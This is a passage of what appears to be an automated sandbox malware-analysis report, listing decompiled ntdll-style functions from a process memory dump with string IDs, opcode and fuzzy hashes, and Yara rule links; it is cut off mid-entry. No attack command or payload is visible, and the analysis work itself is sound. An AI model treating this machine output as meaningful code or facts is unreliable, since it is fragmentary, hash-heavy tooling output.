							_t106 = _t106 + 1;
						}
						_t88 = E0127500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01239860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                                                0x012751be
                                                                                                                0x012751c3
                                                                                                                0x012751c8
                                                                                                                0x012751cd
                                                                                                                0x012751d0
                                                                                                                0x012751d3
                                                                                                                0x012751d8
                                                                                                                0x012751db
                                                                                                                0x012751de
                                                                                                                0x012751e0
                                                                                                                0x012751e3
                                                                                                                0x012751e6
                                                                                                                0x012751e8
                                                                                                                0x01275342
                                                                                                                0x01275351
                                                                                                                0x01275356
                                                                                                                0x0127535a
                                                                                                                0x01275360
                                                                                                                0x01275363
                                                                                                                0x01275366
                                                                                                                0x01275369
                                                                                                                0x01275369
                                                                                                                0x0127536b
                                                                                                                0x0127536b
                                                                                                                0x01275370
                                                                                                                0x012753a3
                                                                                                                0x012753a4
                                                                                                                0x012753a6
                                                                                                                0x012753ab
                                                                                                                0x012753ab
                                                                                                                0x012753ae
                                                                                                                0x012753ae
                                                                                                                0x012753b5
                                                                                                                0x012753bf
                                                                                                                0x012753bf
                                                                                                                0x01275375
                                                                                                                0x01275396
                                                                                                                0x012753a0
                                                                                                                0x012753a0
                                                                                                                0x00000000
                                                                                                                0x01275396
                                                                                                                0x01275377
                                                                                                                0x01275379
                                                                                                                0x0127537f
                                                                                                                0x0127538c
                                                                                                                0x01275390
                                                                                                                0x00000000
                                                                                                                0x01275390
                                                                                                                0x012751ee
                                                                                                                0x012751f1
                                                                                                                0x01275301
                                                                                                                0x01275310
                                                                                                                0x01275315
                                                                                                                0x01275318
                                                                                                                0x0127531b
                                                                                                                0x01275320
                                                                                                                0x0127532e
                                                                                                                0x01275331
                                                                                                                0x00000000
                                                                                                                0x01275331
                                                                                                                0x01275328
                                                                                                                0x01275329
                                                                                                                0x00000000
                                                                                                                0x01275329
                                                                                                                0x012751fa
                                                                                                                0x01275235
                                                                                                                0x01275236
                                                                                                                0x01275239
                                                                                                                0x0127523f
                                                                                                                0x01275240
                                                                                                                0x01275241
                                                                                                                0x01275242
                                                                                                                0x01275246
                                                                                                                0x01275247
                                                                                                                0x0127524e
                                                                                                                0x01275251
                                                                                                                0x01275267
                                                                                                                0x01275269
                                                                                                                0x0127526e
                                                                                                                0x0127527d
                                                                                                                0x0127527e
                                                                                                                0x01275281
                                                                                                                0x01275282
                                                                                                                0x01275287
                                                                                                                0x01275288
                                                                                                                0x0127528a
                                                                                                                0x0127528f
                                                                                                                0x01275294
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127529a
                                                                                                                0x0127529c
                                                                                                                0x0127529e
                                                                                                                0x0127529e
                                                                                                                0x012752a4
                                                                                                                0x012752b0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012752ba
                                                                                                                0x012752bc
                                                                                                                0x012752bc
                                                                                                                0x012752d4
                                                                                                                0x012752d9
                                                                                                                0x012752dc
                                                                                                                0x012752e1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012752e7
                                                                                                                0x012752f4
                                                                                                                0x00000000
                                                                                                                0x012752f4
                                                                                                                0x01275270
                                                                                                                0x00000000
                                                                                                                0x01275270
                                                                                                                0x012751fc
                                                                                                                0x012751fd
                                                                                                                0x01275202
                                                                                                                0x01275203
                                                                                                                0x01275205
                                                                                                                0x0127520a
                                                                                                                0x0127520f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127521b
                                                                                                                0x01275226
                                                                                                                0x0127522b
                                                                                                                0x0127521d
                                                                                                                0x0127521d
                                                                                                                0x01275222
                                                                                                                0x01275222
                                                                                                                0x0127522d
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: Legacy$UEFI
                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                • Opcode ID: f0622d804e97dd562626f237e6259736bbc4da821d7059102f164b500bf72272
                                                                                                                • Instruction ID: 69d919c0a20d2cd918cf6ae8164ed3c9079195e4cc717975741b2573b57e56fa
                                                                                                                • Opcode Fuzzy Hash: f0622d804e97dd562626f237e6259736bbc4da821d7059102f164b500bf72272
                                                                                                                • Instruction Fuzzy Hash: 7D515BB1A206099FDB25DFA8C940BAEFBF8FF58700F14442DE649EB291DB719941CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0121B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0121B9A5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 885266447-0
                                                                                                                • Opcode ID: 71b84ebb722c54f7e6f5a2e9ca7221e0ed4317e46553ff65803e55fe7fad59bb
                                                                                                                • Instruction ID: fbfbec01cafe0e567d48fff8f7f8cc5d3c9a941a9e51f948cc788649b5ff18e5
                                                                                                                • Opcode Fuzzy Hash: 71b84ebb722c54f7e6f5a2e9ca7221e0ed4317e46553ff65803e55fe7fad59bb
                                                                                                                • Instruction Fuzzy Hash: AF515971A28342CFC720DF29C18092ABBF5FB98610F14896EFA8597359D771E844CF92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 011FB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: _vswprintf_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 677850445-0
                                                                                                                • Opcode ID: a94cb6f2e890e56f3a05a78d1efe103ab15d3f05b220401ffb66fed7b7bb079a
                                                                                                                • Instruction ID: e4d4ba73db8dc8216598ba3441677a502b580aa6f06279942c4e79270f8d722f
                                                                                                                • Opcode Fuzzy Hash: a94cb6f2e890e56f3a05a78d1efe103ab15d3f05b220401ffb66fed7b7bb079a
                                                                                                                • Instruction Fuzzy Hash: 1851D471D2429A8BDB75EF68C8857BEFBB0AF04710F1041ADDD599B282E7704981CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01222581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PATH
                                                                                                                • API String ID: 0-1036084923
                                                                                                                • Opcode ID: beb0a3cd6ed1b535f9997bea4742c29e15f098ae3e1d696a50a6373ba2d6995b
                                                                                                                • Instruction ID: 931bee969e7c31678a90519f61ef0d35da1fbe6f0482f2630532e5110f598288
                                                                                                                • Opcode Fuzzy Hash: beb0a3cd6ed1b535f9997bea4742c29e15f098ae3e1d696a50a6373ba2d6995b
                                                                                                                • Instruction Fuzzy Hash: ADC19171E2022AEFDB25DF98D881BBDBBF5FF58740F544029E501AB250E775A841CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0122FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0126BE0F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                                • API String ID: 0-865735534
                                                                                                                • Opcode ID: 232d9cf34c53bf447a949fc39d7cbc16a2ebec0d4202abe2df93b98e93c6a88a
                                                                                                                • Instruction ID: a685dae5de24ef8f19eab341a42d769326343d4f9ff7d553fb09678ae262e211
                                                                                                                • Opcode Fuzzy Hash: 232d9cf34c53bf447a949fc39d7cbc16a2ebec0d4202abe2df93b98e93c6a88a
                                                                                                                • Instruction Fuzzy Hash: D5A10531B20617ABEB26CB68C95477EB7B8AF48710F04456DEA46CB7D1EB70D841CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 011F2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RTL: Re-Waiting
                                                                                                                • API String ID: 0-316354757
                                                                                                                • Opcode ID: 0afa939c781b589ef0dfe7ba2e761f2b50a4449062923e1228845d1ccf838594
                                                                                                                • Instruction ID: 283bcc80ef5cd3c6489b531ee333d5b0b162630758cdabc9fe37ae0d90998b5b
                                                                                                                • Opcode Fuzzy Hash: 0afa939c781b589ef0dfe7ba2e761f2b50a4449062923e1228845d1ccf838594
                                                                                                                • Instruction Fuzzy Hash: 81615531A20656AFEB3ADF6CC944B7E7BE4EB84314F250269DB11972C2C774D901C782
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012C0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `
                                                                                                                • API String ID: 0-2679148245
                                                                                                                • Opcode ID: 354073d180a72a64aaded3a4083f446e4b3760cd0a6d3cb71dc9f98313877b0a
                                                                                                                • Instruction ID: 850942310889db19d3b1fa50387a55db19f92f2bbee4a5b0b68f469028ce0700
                                                                                                                • Opcode Fuzzy Hash: 354073d180a72a64aaded3a4083f446e4b3760cd0a6d3cb71dc9f98313877b0a
                                                                                                                • Instruction Fuzzy Hash: D2519D71324342DBD325DF28D985B2BBBE5EBC4B44F040A2CFB9687291D670E845C766
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0122F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @
                                                                                                                • API String ID: 0-2766056989
                                                                                                                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                • Instruction ID: 29c2097b7d65f554d1c107671b04e17c6844e57c4d1a7bf5369fe61fb08e84b7
                                                                                                                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                • Instruction Fuzzy Hash: E9518D71614711AFC321DF19C841A6BBBF8FF98710F108A2EFA9587690E7B4E944CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01273540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: BinaryHash
                                                                                                                • API String ID: 0-2202222882
                                                                                                                • Opcode ID: 520a2c82627d48bd69a860e7cf127f472762c19bb82520ca20e0e858846bdb49
                                                                                                                • Instruction ID: 32dc905da7439459a21ac10a1a7ebdcc87edbfe68fb9415e88778f9bcce37af6
                                                                                                                • Opcode Fuzzy Hash: 520a2c82627d48bd69a860e7cf127f472762c19bb82520ca20e0e858846bdb49
                                                                                                                • Instruction Fuzzy Hash: 5C4140F2D1052D9EDB21DA50DC80FAEB77CAB54714F0045A5EA08AB240DB309E88DFA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012C05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `
                                                                                                                • API String ID: 0-2679148245
                                                                                                                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                • Instruction ID: b7fd30a95eaa64914730d2f3612397ca2d7c1f4f297f22427fef04938e2d0334
                                                                                                                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                • Instruction Fuzzy Hash: E431F132210306AFE720DE29CC85F9B7BD9ABC4B54F244229FB589B2C0D770E904CB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01273884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: BinaryName
                                                                                                                • API String ID: 0-215506332
                                                                                                                • Opcode ID: 74fd1c763e927024c12cd78aa54eb23405ddf2f1973f194a4368033be29c3371
                                                                                                                • Instruction ID: 878dcab02daaf524663f5c28e2da9853c13ef35725334674c9d8c40133f5f559
                                                                                                                • Opcode Fuzzy Hash: 74fd1c763e927024c12cd78aa54eb23405ddf2f1973f194a4368033be29c3371
                                                                                                                • Instruction Fuzzy Hash: FB31F572D1151AEFEB15DA58C945EBFBBB4FB80B20F014169EA14A7290D7309E00DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0122D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @
                                                                                                                • API String ID: 0-2766056989
                                                                                                                • Opcode ID: 785e408439a737a514b9979d463df9c45a4bafac83cf79d2c8c31ad6ef6d7673
                                                                                                                • Instruction ID: 362dc4bb74077fc31fe53322f187e140abe23590ce25bb58743930a88cb007e4
                                                                                                                • Opcode Fuzzy Hash: 785e408439a737a514b9979d463df9c45a4bafac83cf79d2c8c31ad6ef6d7673
                                                                                                                • Instruction Fuzzy Hash: 9E31ADB156830AAFC311DF68C881A6FBBE8EBD5654F00092EF99483250D634DD04CF92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01201B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: WindowsExcludedProcs
                                                                                                                • API String ID: 0-3583428290
                                                                                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                • Instruction ID: 67fa180b2578fd2a428498d6cb4362ad91c384e0465bbb99adbcbe816a30d2d2
                                                                                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                • Instruction Fuzzy Hash: E121077A56122AABDB239A59C880F6BBBADEF90B50F064525FF04DB241D630DC10C7A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0121F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Actx
                                                                                                                • API String ID: 0-89312691
                                                                                                                • Opcode ID: 8b4334c3b3b1c6f432a8b77e86743d9dee56ccd2de04055fc0436b334b2617f1
                                                                                                                • Instruction ID: f9b3a98c4ef2b685be371a40ebc30afe90944a523889c861a1fb930e3a07b995
                                                                                                                • Opcode Fuzzy Hash: 8b4334c3b3b1c6f432a8b77e86743d9dee56ccd2de04055fc0436b334b2617f1
                                                                                                                • Instruction Fuzzy Hash: 2211B4343347038BF72DCD1C8B5163576D6ABA5224F24452AD671CB3A9D6B0C84B8380
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012A8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • Critical error detected %lx, xrefs: 012A8E21
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Critical error detected %lx
                                                                                                                • API String ID: 0-802127002
                                                                                                                • Opcode ID: 0297c3bd335131fa82150076996f2020f7451b9b402891c63304b313b7893376
                                                                                                                • Instruction ID: 2a87d80229be2165acced13b696d647ad6cb400428aa57f97de0473e56d5247e
                                                                                                                • Opcode Fuzzy Hash: 0297c3bd335131fa82150076996f2020f7451b9b402891c63304b313b7893376
                                                                                                                • Instruction Fuzzy Hash: AE115B71E25349EBDF29DFA886057ACBBB0BB14315F20425EE669AB292D3750601CF14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0128FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0128FF60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                • API String ID: 0-1911121157
                                                                                                                • Opcode ID: fbe95bdc255355424293cf894c8a01dafa48f62dcd1b28c90283afb4707f8293
                                                                                                                • Instruction ID: 97a9e881ebad6783a2f2dada1157231a77be80386d7556e82d5f9b43b318bc9a
                                                                                                                • Opcode Fuzzy Hash: fbe95bdc255355424293cf894c8a01dafa48f62dcd1b28c90283afb4707f8293
                                                                                                                • Instruction Fuzzy Hash: 3411E171931149EFDB26EB54C948FAC7BB1BB24704F148044F6085B1E1C7799950CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012C5BA5, Relevance: .6, Instructions: 592COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9a86417e6047fa5b48aa6d54c9d1d3ff9d973233bc5648fb614f81c8c235e4b5
                                                                                                                • Instruction ID: 75b9a338023e7c648a1737e3cfd5e2f2b266b3e584e2f4088a540cb404780dd2
                                                                                                                • Opcode Fuzzy Hash: 9a86417e6047fa5b48aa6d54c9d1d3ff9d973233bc5648fb614f81c8c235e4b5
                                                                                                                • Instruction Fuzzy Hash: 3B424075A2021ACFDB24CF68C841BA9BBB1FF45704F1482AEDA4DAB342D7749985CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01214120, Relevance: .4, Instructions: 444COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e1dad1f7e96f564b500df3761d3d056dd64ce8692f147a42eb8c7b920fc88017
                                                                                                                • Instruction ID: fd52e68641072038b0f692bcd1dce4965d5754e0eefbef7788d72e4d38eca663
                                                                                                                • Opcode Fuzzy Hash: e1dad1f7e96f564b500df3761d3d056dd64ce8692f147a42eb8c7b920fc88017
                                                                                                                • Instruction Fuzzy Hash: B0F1C3706283528FC724DF18C480A7AB7E1FFA8754F15892EF989CB254E774D981CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012220A0, Relevance: .4, Instructions: 420COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e4cf7b698dddda650b837d662bc60674f2cebc1ad86d6512d0e173172b9fdf8f
                                                                                                                • Instruction ID: a0f8f27fb88834e9a969525965611f5d9d30bcdd2b7970eab693a338fe88699f
                                                                                                                • Opcode Fuzzy Hash: e4cf7b698dddda650b837d662bc60674f2cebc1ad86d6512d0e173172b9fdf8f
                                                                                                                • Instruction Fuzzy Hash: 62F12731638352EFE726CF2CC440B6E7BE5AF85354F14861DEA959B281D776D880CB82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0120D5E0, Relevance: .4, Instructions: 353COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1569c8ff7ef7f5aa344e512d713f09570c31d31ca78535ad711e57c0a9d7ed07
                                                                                                                • Instruction ID: a55a6608328915239edf6bd27819531a88c6abd196d1178779628bd50da82238
                                                                                                                • Opcode Fuzzy Hash: 1569c8ff7ef7f5aa344e512d713f09570c31d31ca78535ad711e57c0a9d7ed07
                                                                                                                • Instruction Fuzzy Hash: 62E1D770A2135ACFEB36CF98C894B79BBB2BF45304F040299DA096B2D2D7749981CF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0120849B, Relevance: .3, Instructions: 290COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 72cc62db7afd8d7525ef139e678450cdd77a26fd0cf2a743354d1626cb6c0d5b
                                                                                                                • Instruction ID: ef9ba0a0a7f67a4b24efa9c880cfb4b08500b4183562ccae037a43249c4db45f
                                                                                                                • Opcode Fuzzy Hash: 72cc62db7afd8d7525ef139e678450cdd77a26fd0cf2a743354d1626cb6c0d5b
                                                                                                                • Instruction Fuzzy Hash: D6B17074E2020ADFDF1ADF98C984AAEBBF5FF54304F10422DE505AB286E770A941CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0122513A, Relevance: .3, Instructions: 258COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 164de301e1ee2d96c09f1b842608d65e4fa27aa42ed5075a5d7b42caeef76d16
                                                                                                                • Instruction ID: 1a42b48b23489bae12904a65d0a260671a8b0a9efa03d268284495ea0f01d232
                                                                                                                • Opcode Fuzzy Hash: 164de301e1ee2d96c09f1b842608d65e4fa27aa42ed5075a5d7b42caeef76d16
                                                                                                                • Instruction Fuzzy Hash: 3AC124755183819FD354CF28C580A6AFBF1BF88304F148A6EF9998B392D771E985CB42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012203E2, Relevance: .3, Instructions: 254COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7b85fce20ac6e2fce89e8c1e11d9b0027e3bc622cc48058c6e0236f857bad7ee
                                                                                                                • Instruction ID: abedde7d060f51f2af35a85e3fa6b073a78cde5169d752845339dc9a34cce19a
                                                                                                                • Opcode Fuzzy Hash: 7b85fce20ac6e2fce89e8c1e11d9b0027e3bc622cc48058c6e0236f857bad7ee
                                                                                                                • Instruction Fuzzy Hash: 66913B31E20266AFEB31AB6CD844BBE7BE8EB11714F050265FB50AB2D1D7749D40C785
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 011FC600, Relevance: .2, Instructions: 225COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: faea5307ebee00379202e04ae983e02faa473408e2bcd54729dafe75695ef228
                                                                                                                • Instruction ID: cf2b2ea81f27ae4f28963d9c3694e3692566625fbd633bcd79973556b9557489
                                                                                                                • Opcode Fuzzy Hash: faea5307ebee00379202e04ae983e02faa473408e2bcd54729dafe75695ef228
                                                                                                                • Instruction Fuzzy Hash: 1A81A3756242428BDB26CE58D881A7F77ECEF84358F14485AEF459B281E330DD80CBD2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0128B8D0, Relevance: .2, Instructions: 199COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ea3a9b7e6b7e6b75df8bef114bef809f3f62cb822c0239167c71ac06bd887441
                                                                                                                • Instruction ID: ddac5e99d1a055aaa5339e9b180ab802895e596f7929cbae6daa78c1efd16c69
                                                                                                                • Opcode Fuzzy Hash: ea3a9b7e6b7e6b75df8bef114bef809f3f62cb822c0239167c71ac06bd887441
                                                                                                                • Instruction Fuzzy Hash: DF711272261B02AFEB32EF18C845F66BBE5EB44721F14452CE755876E0DBB1E941CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01276DC9, Relevance: .2, Instructions: 199COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
